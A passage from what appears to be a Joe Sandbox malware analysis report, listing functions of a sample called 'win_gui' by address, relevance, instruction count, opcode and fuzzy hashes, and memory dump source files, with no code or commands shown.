                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0eb59dee6d3e119db8b466b11e17779a64a4fad77ae0a839475259d5e2408d69
                                  • Instruction ID: 9ed9120f8196f388cc64e6302ac1bf9eef6fa9f0169fcd3639a98254c22fb473
                                  • Opcode Fuzzy Hash: 0eb59dee6d3e119db8b466b11e17779a64a4fad77ae0a839475259d5e2408d69
                                  • Instruction Fuzzy Hash: 68326C2120C3D58FD71ACA7D48A01AFFFE19AEB240F584A9EF5D487343C565C609DBA2
                                  Function 005E5720 Relevance: .6, Instructions: 624COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a1566ac7965f74862ca2d7e85da782d71d136d1334abe135f5876c6ee6f03a72
                                  • Instruction ID: 0cb8baf30508d8e22daa5cfa454f0b93de33e83b86e6d5bdf9a19052e7133d75
                                  • Opcode Fuzzy Hash: a1566ac7965f74862ca2d7e85da782d71d136d1334abe135f5876c6ee6f03a72
                                  • Instruction Fuzzy Hash: E8323E727483158FC708CE5DDC9069AB3E2BFC8304F29893DE45AD7741E7B5E94A8A81
                                  Function 005F3080 Relevance: .5, Instructions: 499COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 50e1839067a938a4340039a17895e1a35278b9cbb531771d311e27b929ed62b4
                                  • Instruction ID: 8edfa012f4117d164b0d4765ca11b76739ae01dc17df8a6c8e5ec5bbb87fb512
                                  • Opcode Fuzzy Hash: 50e1839067a938a4340039a17895e1a35278b9cbb531771d311e27b929ed62b4
                                  • Instruction Fuzzy Hash: 73121411315FC58FD315CA7D889065AFED2ABA6200B8C8A7DD4C6DBB83C514F919C7E1
                                  Function 0064F440 Relevance: .5, Instructions: 499COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d2f09104549c98e5d0c698e80f063e1464938ce9e2b9eb563888fc98ba13e668
                                  • Instruction ID: 17cbe1eb34f56784a9124cb031c0867f1ecc09e7d4220d30cc5455b3952742cb
                                  • Opcode Fuzzy Hash: d2f09104549c98e5d0c698e80f063e1464938ce9e2b9eb563888fc98ba13e668
                                  • Instruction Fuzzy Hash: 4722D272A483048FC348CF6DC99174AF7E5BB88308F09992EF599D7361E375E9448B86
                                  Function 0064EE20 Relevance: .5, Instructions: 471COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c55e29baf45f0b8c46a0651a271d74e4ce5063fb2c57e74d2ba3183198912c1f
                                  • Instruction ID: 0b126b78cae3c02aac2d5b7a8279ed4b1d9de35c03c959dd95ba0ec101568cfe
                                  • Opcode Fuzzy Hash: c55e29baf45f0b8c46a0651a271d74e4ce5063fb2c57e74d2ba3183198912c1f
                                  • Instruction Fuzzy Hash: 4B12C272A483008FD348CF5DC99174AF7E5BB89308F099A2EF599D7361E374E9448B86
                                  Function 0062F0D0 Relevance: .4, Instructions: 430COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9f51778620f46ca5f438300608c030772256d701fee09a5b4d28a69d79532dab
                                  • Instruction ID: b1232e2b9e41a8231061837e23a65ab01ec461fe1ac8d785d8cde41df7bc0820
                                  • Opcode Fuzzy Hash: 9f51778620f46ca5f438300608c030772256d701fee09a5b4d28a69d79532dab
                                  • Instruction Fuzzy Hash: C7D16B734049B24AC711DB3DA8545BBFBF7AA91314B0903B9E8E5C7382EA21DD068F91
                                  Function 00604FE0 Relevance: .4, Instructions: 410COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4d60fef59181d592449ee0f12e2a7b920fd4996d500fe6ff420bbdaee1dfcdb1
                                  • Instruction ID: 917fb797465f4acd54505d2a27781ea58132cf893b2480a0dbab17bf6482db30
                                  • Opcode Fuzzy Hash: 4d60fef59181d592449ee0f12e2a7b920fd4996d500fe6ff420bbdaee1dfcdb1
                                  • Instruction Fuzzy Hash: 56F1833050D3D49FD319CB2D885046EFFE1AADA205F488A9EF4D99B383D538D615CBA2
                                  Function 0060D750 Relevance: .4, Instructions: 393COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 02f78941364bf21018773a3860b912fa466c2141e0d6c2d661ea71293bae1872
                                  • Instruction ID: 013bb179f1e4ccc065d4f3615d48da99307281a72c3ade83b20fbe1d1c0ced8e
                                  • Opcode Fuzzy Hash: 02f78941364bf21018773a3860b912fa466c2141e0d6c2d661ea71293bae1872
                                  • Instruction Fuzzy Hash: 44E1A53051D3D54FD759CF6D884006EFFE1AAD6201B88869EF8E4DB383D628D615CBA2
                                  Function 0060B7A0 Relevance: .4, Instructions: 392COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 166bc135746e2ec5d2e9dfb179288c25e0d01bed9275c04452a8ca297408ce4c
                                  • Instruction ID: dce0ddb34656bdefa2a1fa9734bb429dbeda910f1f952121bf53a3d93367165b
                                  • Opcode Fuzzy Hash: 166bc135746e2ec5d2e9dfb179288c25e0d01bed9275c04452a8ca297408ce4c
                                  • Instruction Fuzzy Hash: 9FE1843051D3D54FD719CF2D885006EBFE1AAD6201B88C69EF8E4DB383C628D615CBA2
                                  Function 00611840 Relevance: .4, Instructions: 365COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 541a8fb7c9a610bbacd7b1450712728d89bda8c489194a11055565e2474037b7
                                  • Instruction ID: 3676238b550a7fe9f83d09b47422a598c22b57582f33228f1b6a2c385330c9dd
                                  • Opcode Fuzzy Hash: 541a8fb7c9a610bbacd7b1450712728d89bda8c489194a11055565e2474037b7
                                  • Instruction Fuzzy Hash: 04E17B72B145114FD358CF2DE890639B7E2FF8A301B49853EE54ACB392DA38E951DB90
                                  Function 006110C0 Relevance: .4, Instructions: 357COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0be8eb0f0e3c32047867aa7782ad5884bfbf9b69eb9a68576feefaf9a99e4690
                                  • Instruction ID: e8341eca390623d891ebf7ef35b63f03fe6eefc97bacf32566fca69591551661
                                  • Opcode Fuzzy Hash: 0be8eb0f0e3c32047867aa7782ad5884bfbf9b69eb9a68576feefaf9a99e4690
                                  • Instruction Fuzzy Hash: 1BE16B316146548FC748DF2DEC9153A77E2FB8A301B49461EF282D7292CA38FA1ADF51
                                  Function 00610B70 Relevance: .4, Instructions: 356COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4aacd5c943ef1dfd5d7e8a74f54d9f157b73ca9d43468d66cb27092a630ee226
                                  • Instruction ID: b833b10f2a8a2e7122ef568e93b5be4801192f7dce758b8452bcf307a5f8e514
                                  • Opcode Fuzzy Hash: 4aacd5c943ef1dfd5d7e8a74f54d9f157b73ca9d43468d66cb27092a630ee226
                                  • Instruction Fuzzy Hash: 61E161756282A44FC348DF2DDC905367BE1FB8A302789455EF592C7292CA38F616DFA0
                                  Function 00640760 Relevance: .3, Instructions: 313COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 23d942db8e4fb4905934842cc12cc68ce6e03837cf3406f9f5f7fb21cf32dd6f
                                  • Instruction ID: aef9ccad4877aea446fe42c2eaef76f0eb8acb0a5d28f146554cc17f2e1f1132
                                  • Opcode Fuzzy Hash: 23d942db8e4fb4905934842cc12cc68ce6e03837cf3406f9f5f7fb21cf32dd6f
                                  • Instruction Fuzzy Hash: FEE1E8719083858FD760DF68C58169AF7E4FFD8348F149A1EF998D3212E770EA948B42
                                  Function 00617060 Relevance: .3, Instructions: 307COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 46eff3f6e953894dcad5b897b9b0975945d4dfc673e8980460966a7401aa65db
                                  • Instruction ID: 9428d430f36084452e61004952d7d4cab1117ad2f92fac72259066641b9f6cbd
                                  • Opcode Fuzzy Hash: 46eff3f6e953894dcad5b897b9b0975945d4dfc673e8980460966a7401aa65db
                                  • Instruction Fuzzy Hash: CFB12B72A083554FC754DE6DCCC030AFBE2ABC8204F098A3DF9A8D7351E6B5D9098B95
                                  Function 005FF3F0 Relevance: .3, Instructions: 301COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f17e41db9f0fbd867ddd6435c878bf2fbe418e91ca59cd629b0a1b52c81ff1bc
                                  • Instruction ID: 7209c05befe545dd452b077640ea0d3fb8005822a3488f6cbd5c34cf9ed184f9
                                  • Opcode Fuzzy Hash: f17e41db9f0fbd867ddd6435c878bf2fbe418e91ca59cd629b0a1b52c81ff1bc
                                  • Instruction Fuzzy Hash: 99E16635108A669FC715CF1CC0808B1BBE5FF99305B9AC19EE5848B387C239F56ADB61
                                  Function 00650710 Relevance: .3, Instructions: 296COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dc74576a27e48650034c967aaa1215bd9a753dfe10509ff2093f1a3918cb92cf
                                  • Instruction ID: b2301a0e05d89ec46a0b70ccdd5d6ebdd076824a52cd75ac6958d924a1e48e9c
                                  • Opcode Fuzzy Hash: dc74576a27e48650034c967aaa1215bd9a753dfe10509ff2093f1a3918cb92cf
                                  • Instruction Fuzzy Hash: 1CA13CB2A18215AFC790DF6ADC81EDB77EDFF89304F000919B949D7202D630E594C7A9
                                  Function 00610360 Relevance: .3, Instructions: 289COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c35a6892251de12a6af7f526a14f710e739658ca4f81a9cf8477aa6039a2f9fb
                                  • Instruction ID: 5717e675ddfb7e9f642dbe05e8b0019461b06a77d5ba0d74b3690daa75bb9fa0
                                  • Opcode Fuzzy Hash: c35a6892251de12a6af7f526a14f710e739658ca4f81a9cf8477aa6039a2f9fb
                                  • Instruction Fuzzy Hash: 82C10C726101648BCB94EF9EECD04A93752F7DB30278A9319F64083359C678FA1ACF94
                                  Function 0060E000 Relevance: .3, Instructions: 270COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cbfc22247dd1a27c67c2e1c9d3eda70da47fab5ab8e7f0bf0b48f215fb3cd2fa
                                  • Instruction ID: 4779154c6f2400f0ab640f982372e7f6d1b5814106517a1a4e5328f621894e0a
                                  • Opcode Fuzzy Hash: cbfc22247dd1a27c67c2e1c9d3eda70da47fab5ab8e7f0bf0b48f215fb3cd2fa
                                  • Instruction Fuzzy Hash: C7C13F702109129BD349CE0ED89497AB3E2FB8831AFC1835DE945D7689CB39F47987E1
                                  Function 00624320 Relevance: .3, Instructions: 270COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
